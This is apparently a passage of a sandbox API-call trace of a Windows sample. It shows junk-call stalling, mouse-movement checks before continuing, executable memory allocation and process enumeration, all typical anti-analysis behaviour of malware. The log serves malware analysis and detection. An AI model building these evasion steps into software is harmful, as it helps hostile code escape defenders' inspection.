| out: lpsz=0x0) returned 0 [0165.883] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.883] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.883] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.884] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.884] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.884] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.884] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.884] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.884] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.884] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.884] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.884] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.884] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.884] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.884] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.884] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.884] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.884] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.884] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.884] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.884] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.884] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.884] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.884] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.884] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.884] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.884] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.884] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.884] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.884] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.884] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.884] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.884] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.884] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.884] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.884] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.884] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.884] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.884] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.884] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.884] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.884] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0165.885] VirtualAlloc (lpAddress=0x0, dwSize=0x21930000, flAllocationType=0x2000, flProtect=0x1) returned 0x3060000 [0165.897] VirtualAlloc (lpAddress=0x3060000, dwSize=0x2192c000, flAllocationType=0x1000, flProtect=0x4) returned 0x3060000 [0174.290] VirtualFree (lpAddress=0x3060000, dwSize=0x2192c000, dwFreeType=0x4000) returned 1 [0180.124] VirtualFree (lpAddress=0x3060000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.777] LoadLibraryA (lpLibFileName="C3taUqjCU7eqAyIdAPzjF1nHWemMrup9L3lp460T2.dll") returned 0x0 [0182.778] GetModuleHandleA (lpModuleName="mzfjTcKYjWs7xdfL71cu9tmd9Cw") returned 0x0 [0182.779] GetProcAddress (hModule=0x0, lpProcName="AZMOMSaCRwayip0wWNKiES7U") returned 0x0 [0182.779] GetModuleHandleA (lpModuleName="user32") returned 0x77820000 [0182.779] GetProcAddress (hModule=0x77820000, lpProcName="GetCursorPos") returned 0x77841218 [0182.783] GetCursorPos (in: lpPoint=0x18ff2c | out: lpPoint=0x18ff2c*(x=667, y=445)) returned 1 [0182.783] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=445)) returned 1 [0182.783] Sleep (dwMilliseconds=0xac) [0182.957] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=445)) returned 1 [0182.958] Sleep (dwMilliseconds=0xac) [0183.145] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=445)) returned 1 [0183.145] Sleep (dwMilliseconds=0xac) [0183.332] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=445)) returned 1 [0183.332] Sleep (dwMilliseconds=0xac) [0183.520] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=445)) returned 1 [0183.520] Sleep (dwMilliseconds=0xac) [0183.706] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=445)) returned 1 [0183.706] Sleep (dwMilliseconds=0xac) [0183.894] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=445)) returned 1 [0183.894] Sleep (dwMilliseconds=0xac) [0184.081] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=445)) returned 1 [0184.081] Sleep (dwMilliseconds=0xac) [0184.268] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=445)) returned 1 [0184.268] Sleep (dwMilliseconds=0xac) [0184.456] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=445)) returned 1 [0184.456] Sleep (dwMilliseconds=0xac) [0184.642] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=445)) returned 1 [0184.642] Sleep (dwMilliseconds=0xac) [0184.830] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=445)) returned 1 [0184.830] Sleep (dwMilliseconds=0xac) [0185.017] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=445)) returned 1 [0185.017] Sleep (dwMilliseconds=0xac) [0185.204] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=445)) returned 1 [0185.204] Sleep (dwMilliseconds=0xac) [0185.391] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=667, y=445)) returned 1 [0185.391] Sleep (dwMilliseconds=0xac) [0185.853] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=882, y=445)) returned 1 [0185.853] Sleep (dwMilliseconds=0xac) [0186.031] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=882, y=445)) returned 1 [0186.031] Sleep (dwMilliseconds=0xac) [0186.218] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=882, y=445)) returned 1 [0186.218] Sleep (dwMilliseconds=0xac) [0186.407] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=882, y=445)) returned 1 [0186.407] Sleep (dwMilliseconds=0xac) [0186.593] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=882, y=445)) returned 1 [0186.593] Sleep (dwMilliseconds=0xac) [0186.780] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=882, y=445)) returned 1 [0186.780] Sleep (dwMilliseconds=0xac) [0186.967] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=882, y=445)) returned 1 [0186.967] Sleep (dwMilliseconds=0xac) [0187.154] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=882, y=445)) returned 1 [0187.154] Sleep (dwMilliseconds=0xac) [0187.378] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=882, y=445)) returned 1 [0187.378] Sleep (dwMilliseconds=0xac) [0187.560] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=882, y=445)) returned 1 [0187.560] Sleep (dwMilliseconds=0xac) [0187.747] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=882, y=445)) returned 1 [0187.747] Sleep (dwMilliseconds=0xac) [0187.934] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=882, y=445)) returned 1 [0187.934] Sleep (dwMilliseconds=0xac) [0188.121] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=882, y=445)) returned 1 [0188.121] Sleep (dwMilliseconds=0xac) [0188.309] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=882, y=445)) returned 1 [0188.309] Sleep (dwMilliseconds=0xac) [0188.573] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=237, y=471)) returned 1 [0188.574] Sleep (dwMilliseconds=0xac) [0188.792] GetCursorPos (in: lpPoint=0x18ff34 | out: lpPoint=0x18ff34*(x=237, y=471)) returned 1 [0188.792] Sleep (dwMilliseconds=0xac) [0189.137] VirtualAlloc (lpAddress=0x2a4000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x2a4000 [0189.138] VirtualAlloc (lpAddress=0x0, dwSize=0x100, flAllocationType=0x3000, flProtect=0x4) returned 0x3d0000 [0189.140] LoadLibraryA (lpLibFileName="shell32") returned 0x76b00000 [0189.141] LoadLibraryA (lpLibFileName="user32") returned 0x77820000 [0189.141] LoadLibraryA (lpLibFileName="advapi32") returned 0x76490000 [0189.141] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x3e0000 [0189.142] VirtualAlloc (lpAddress=0x0, dwSize=0x8000005, flAllocationType=0x3000, flProtect=0x4) returned 0x3060000 [0191.276] VirtualFree (lpAddress=0x3060000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.203] VirtualAlloc (lpAddress=0x0, dwSize=0x101d0, flAllocationType=0x3000, flProtect=0x4) returned 0x4c0000 [0192.203] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe4 [0192.206] Process32FirstW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0192.207] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0192.208] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0192.209] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0192.209] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0192.210] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0192.211] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0192.212] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0192.212] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0192.213] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0192.214] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.215] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.215] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.216] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.217] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.218] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0192.219] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.220] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0192.220] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0192.221] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.222] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0192.222] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0192.223] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.225] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x548, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0192.226] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0192.226] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0192.227] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x730, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="easily.exe")) returned 1 [0192.228] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x698, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="stockportsconvenient.exe")) returned 1 [0192.229] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dangerous.exe")) returned 1 [0192.229] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="retained_one_psychology.exe")) returned 1 [0192.230] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x760, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pentium-southampton.exe")) returned 1 [0192.231] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="declare.exe")) returned 1 [0192.232] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="credit-albania.exe")) returned 1 [0192.232] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x450, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="celebrate.exe")) returned 1 [0192.233] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="watson_block.exe")) returned 1 [0192.234] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beef-http-plants.exe")) returned 1 [0192.234] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="hunting garmin marriage.exe")) returned 1 [0192.235] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="portsmouth_sauce_certificates.exe")) returned 1 [0192.236] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="insights hu.exe")) returned 1 [0192.237] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x578, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="stroke_enough_reporter.exe")) returned 1 [0192.237] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="por tramadol started.exe")) returned 1 [0192.238] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="add.exe")) returned 1 [0192.239] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="argentinasovietavg.exe")) returned 1 [0192.239] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="EXCEL.EXE")) returned 1 [0192.240] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.241] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, 